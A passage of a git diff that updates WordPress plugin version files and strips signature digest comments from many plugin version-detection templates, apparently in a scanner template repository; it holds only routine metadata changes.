http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 211 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index ba09cfd650..3884b9bcd9 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.3.2 \ No newline at end of file +5.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 9b7a431d9f..448ada3bda 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.2.4 \ No newline at end of file +3.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 860251185a..f0fed9186c 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.32.0 \ No newline at end of file +1.33.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index 4b4ea1b688..81f1b89fea 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -3.4.6 \ No newline at end of file +3.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index d667599f26..7f5db23d1c 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.36 \ No newline at end of file +4.10.37 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index 5a34f27cf4..02922966cf 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.979 \ No newline at end of file +1.3.980 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index eeb2820605..548ceff894 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.222 \ No newline at end of file +1.0.223 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index bbd8e9206e..6e218b78e5 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.6.1 \ No newline at end of file +7.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt index 0e5aa899e0..468c41f93c 100644 --- a/helpers/wordpress/plugins/shortcodes-ultimate.txt +++ b/helpers/wordpress/plugins/shortcodes-ultimate.txt @@ -1 +1 @@ -7.1.8 \ No newline at end of file +7.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 72dfaf1650..84c5308f03 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.8.1 \ No newline at end of file +7.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index 69669de698..c56eaaaf45 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.12.2 \ No newline at end of file +1.12.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 9217fea241..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000b1e46493e43063d51c2adedbdc60f54cf093a7667c5fc01ee38ea82c8f9e28022100b3f3d955b2c1ff2e60446258eea31b80991f61fde04d34f314e495daa7299f3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 668bc84048..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220690a0f8a3f72d97ea9fc4fca292474308b5907e823f5878d70f590362ba7c3a9022060ed54e1fc4331b08804676916169e3e3e5cc96f992c834db926cdba45608865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index a44f2864b1..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c05a512c903aaecc2c4df6769175f7af14cd5856a0a6bc280f8423be5d04fe702200a41e88fd5bbe2bbd4dad978502abf4da67d2247e4eaa0a28b9425e9f6369ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index ffdae6908e..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7a9d880c3237ba183dec9475c44fcf221f17f08316030fec5e107957f0516d9022100e58f78775f0451b13ea863e0870d382baba32efc77567e21a0e56b24ed67dbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 8ba8e3639e..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220107aa75b8f3f11fd71081c510be9a9e420e8eef397d99cefebf5f341d134bbdd02207ca682994f9da63f67d1a905267675e0e7166efcec9d2a7d5f4eba377de006b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 739b838e05..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e1e84d65aa74e3e0e2d47d555702218883cd86f71dc2655b475a7d1a2f03b000221009be3cb9e75aa59678f5cb5bf4da749d3e7fcbec8f227c6bb94b4a0167f393144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 6368040c9a..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d6774e49fd08067b7e090fd0be6d18800ed9b9e8d122a6c40c6ff40a1fabf07022100c95ea174d2cb196ebf350b575921b1222e1ffe4a2e0d7fb6f82938620054223e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 25b575c5b1..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220554e34006563dd08d4bcfb4b6a177313b6dc9e00e93b94a3f2b705f3d9fdab9d022007ebf1febb018f7be01c9e7c5d56a7cae2cb6405c8d9c1bb7e5b44d83037b136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index e7aee6e832..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d263e57577806079fd4a261f119ffac6828bceed19c77a674088f40427c3bf3022100e893ea2eb3186d869765d6b76d7fdad61903375b849e4b75a7175af1be1c1c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e07510a2c2..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f565ce787f4d311b9c5320a6321159348b77c0d102a60ec300839840ed433c0022100c824e6676f256917fbd100afd2490982ab89a348da052b7361b0d5fe9cfd9b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 7cadd9619e..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203558201bb4dd5a68db7b2e7d602573f62c87a6bb7b0dc3eab0b3c218a3a0d7d9022024209e4f6c9cd8e71f948f3289d3c10a426e527d636d626679c5990c99bcf44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 3e6e74325b..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220426dfa2854b9c515c2d04fb05531249a635290b37bb3f2b0b9d0b41d6cb942210220538bd278c316356434e1687def9ce0518529b2983ebb6eaf7288c5c882ed1429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 036128a197..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008405bf7bae9c61712b07587a009c640019a17084ad48f93b555cd07ca85592e502205d95f8d7ce3e008715d184dfb97c13c91d765124439b1a50f81140aca0cb5b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 689bf1faeb..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b2c2ce1341c322cb29182feed85d5d1f7b0e55687a730b28ce427ab1554fe9b022100f97ef973f20e7045fb61e477c12dee7761edc8413bdda39e895633a5f4d221b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index bf31e9872b..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042587514e139ec00607edd73ac20ecac6f755a9939690fe95a123c2e489ae0a4022100e256542c51ae86808cce5e906cbcf75261890aac2b43a496a6677fd91f7d5384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 4f477a6b13..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd13f57f68e2e7d39e6e81d799badf14c7d5cb1e2dd43ff6f8648ddeca59e69e022100a5e4bfafcc7e25e461114386ac9a56b523f445b4549dd7bcbc4587ccd2773d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c9351b108f..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a817969965da711e8b60cf0433f9b44e7ab0c64d7aac347d35cb862ab0e1c19402207b79e6ab056a3ebfa84d515fb82bf241b28fe73e10c9f5e64881e1291a52435e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 7baa8305af..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad3f68b686fa910c306265456f00fe58341e0cf1f52a1ffa3d790299703febc50221008cb55552d595d907151402ff48ed136a022f0bd38aefc70feaf633630ca40464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 757bbc1f4f..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cb1b0d3800d9d608217ff825e81f39b085e6bd9139139fcbf073f2d891554b3022100e8cb0eb2814a8ec69321b6ec656863888fecc6a702d12c885017d1ee7106ca6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index c748b9c51a..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220636fbbe948fe30c6a91dd4a9093ed221d7f8a186607c18482e1987c68b1add5c022100ac1a6dec93b32f63676329103d300a92c27f35dd985f322fabe6283759d06c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 4db6a405cd..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfa100e0acf43683080bf1fb05c19fb0c57c6856a9ed109e2f349ef838447711022100ad14df13f9cc5e97727a389c370ba43d2770d92c29938172a621822c751960da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index f0bf70c5a7..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0795fd49ffe260f662d7833ed60f4a3ee97e0a1c091f942f6bd5dfdb7657ad902201d1c56fc4d73fe5f96f610fd47d1e78a7d32069f271639803d619ed178ae6317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 04da5075a4..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb387ef1353ed22ba9e955ba66a381578d012221e169eb1588fee2cd58d690b80220342f8c32942be13da7a3709a6e1cdefe0ac40e6ba7e75bd9bacc2c0987af128e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 5322b4a34e..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec41318d996698c266376336f9d748acf2df7eff4cae613ab4694d288bdd8cbf0220602563c441d91c5bc64a145703f1032bb5bbf20d6d19a66cf0d80697ba1a7856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 58929a537f..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100977157248671bf40e47561d444e9bcf17b42e465411279a09aa5f509bdd22bf102201066c65e4418cc5899aca74c398837269f2b478a3669157f5850e977683b3eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 8cedbd5267..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055f377e3abf2670e5abb980dbdbdfaef27b99555805f0a6aaab55c83c95c9eb80221008adfb9a5199fe885e6db26a3f40af2a0c8b360307f093cd4a5b6a330c9a3b984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 76bedbb3c3..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091d8ccae937979f81beed96269ecba5466b8a2aad0a14095ea465b32821d2e980220070b5a7b1293791e4f8f100306a5236612c2ba4f28e1f3c66144cd73ad80f4f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index adaf4ecae2..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220513e68a5124b3f29e8844052f6311f5293c3bd376c3ce45f026d672e83f00fc702204e750c48b5928af2f103650940debef4d7d0af509b802d567df7b475034bf1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d463433664..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb0445efbde7f26077f3b48ff5e53cf1d1a3b55a61af5824389cf0412b6b03a602207aa75967b92c6c2559d86a862cad4a85083570652fc6bb21e45af5523b43a066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index b5fa266362..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e013ec59adfff32d71a88c5c7b6c5ce0af148a18227bd4f7a74a98d63ccbbe202201588aa83352424087d24f8cc3773da6e292725d52b7317d12250a1fffeb1c051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index b92eeef6f5..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201bc38c0f5d88cadda71d295d2bc50a714aac105cb72f9931d482033fed6584fa02200b91ff8c8d2e9f6fccd45b77405d531ae67d3e800c7e789c1f9d8fd848c1ee71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 10a6e087d5..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7f36201c832c8bdd692f3b29dbb007ed952f15495b1029d4110be06821822f1022017ce7812981acd717163815e10c620ec91603a04a2ae98848e612e8c721760c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 20ec6aef1c..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017bf92efe29161cdaf705bca0b889a9d608f0037a0eff16122157a0e3220afb7022100958d80c4d55f5e2e92daa9e5bd835065a755c33b82a59a6d0b2a96f47aaa5732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 653ebda20f..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1bb75e9850fc1394117d85bb5ab55fe3f9d2de0e27ba145f2b1a3f89766976a022100e09560d3f214c6b2572b3550ddac5fafd32497129c9a912f952e112cbfdd87d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 671f9f16f4..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022018cab9081e043729db09e9b37153ef2b51ee290d88cdee5c7de8150eeca03b15022100b4e6b6d7f111df0b23c2407d2e0ee92e78d8ac0ce8e23c06098380d8ebd84621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c17c8adbb2..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206415a097e4a12ab73e541b0ffe564c23bcc1515c342ea8bf97ea599d62bdaae1022100f7b8d2aacc052671eb704fe2dbf7c2b81c82a83ebf98c9a05bf3b41e87acf9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 62a7acb542..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e019012493fd241bbdc14b5145781f2a28fee5644f7aec272622be85bf3e8be022100d96098de74700afb184f448ef0f4021ff3baa59c95cc05912ca1ec3ac0f86e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 69a332d0ac..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201af4c24576758970bb619ba72a3787e9c6b81754dbfa573fd10ab618696b48920220573832c0caf8919135d9a67c3af4e46284400a47c53f899ba0224ae501f7040e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 8077798f5f..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220727e034a12924e3d688d89df534b5bd7720f38e9425b0d6f34edba5ffd60bc9a022100ff13fcc0e45d94834d548c34cf210e3503acbf0e5aa6b19a4986baa81b22d87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 51c04665c2..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220449cc13e3691f0806c03720d96eafca4abf0fb4600b971213c89fc42901b5a5f022100c1b16a6fdb0864d7892198d3ece4ad0a25caf260e35ed92cef5cc3e3d38c9a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 25ade1be03..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 